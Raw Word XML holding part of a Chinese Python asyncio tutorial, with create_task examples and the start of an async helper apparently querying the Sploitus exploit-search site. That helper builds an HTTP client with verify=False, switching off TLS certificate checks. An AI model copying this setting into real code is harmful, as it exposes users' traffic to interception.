    <w:p w14:paraId="6418DA50" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556EE1C5" w14:textId="20628D93" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异步编程中，要实现并发，一种常见的方式是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.gather(*tasks) </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.wait(tasks) </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，它们可以接受多个协程，然后在单个操作中等待所有协程完成。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D82B8B" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150B3955" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:t xml:space="preserve">    task1 = </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>asyncio.create_task</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:t>(say_after(1, 'hello'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11865298" w14:textId="015B633B" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:t xml:space="preserve">    task2 = </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>asyncio.create_task</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:t>(say_after(2, 'world'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB6C63" w14:textId="0362D393" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:t xml:space="preserve">    print(f"started at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0969ED9B" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:t xml:space="preserve">    await task1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3861B4FE" w14:textId="7FDE0495" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:t xml:space="preserve">    await task2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D81E4BC" w14:textId="29FA8415" w:rsidR="008139AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:t xml:space="preserve">    print(f"finished at {time.strftime('%X')}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF91F2E" w14:textId="192E00D7" w:rsidR="001A21AE" w:rsidRPr="001A21AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2D7264" w14:textId="3DDD4D76" w:rsidR="008139AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个修改后的代码中，</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">say_after(1, 'hello') </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> say_after(2, 'world') </w:t>
      </w:r>
      <w:r w:rsidRPr="001A21AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会并发执行，而不是顺序执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BC072" w14:textId="77777777" w:rsidR="008139AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6701F8E6" w14:textId="77777777" w:rsidR="008139AE" w:rsidRPr="008139AE" w:rsidRDefault="008139AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12102E89" w14:textId="399B8A5F" w:rsidR="009F7C67" w:rsidRDefault="00540925" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建异步方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDFCAEC" w14:textId="5C35D969" w:rsidR="00C447B6" w:rsidRDefault="00C447B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42098D64" w14:textId="33DF47D9" w:rsidR="00C447B6" w:rsidRDefault="00C447B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75790538" w14:textId="77777777" w:rsidR="00C447B6" w:rsidRDefault="00C447B6" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>foo</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>模拟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">'hello'  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>协程的返回值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>main</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task = asyncio.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>create_task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">())  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>协程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">result = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">task  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>等待</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> foo() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>协程完成，并获取其返回值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(result)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打印</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'hello'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC40357" w14:textId="77777777" w:rsidR="004E0A17" w:rsidRPr="00C447B6" w:rsidRDefault="004E0A17" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F65FE3" w14:textId="160F6C87" w:rsidR="004E0A17" w:rsidRDefault="00C447B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50912599" w14:textId="77777777" w:rsidR="00C447B6" w:rsidRDefault="00C447B6" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>querySploitus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>url</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data_offset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">async with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>httpx.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>proxies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">=proxies, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>client:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        response = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
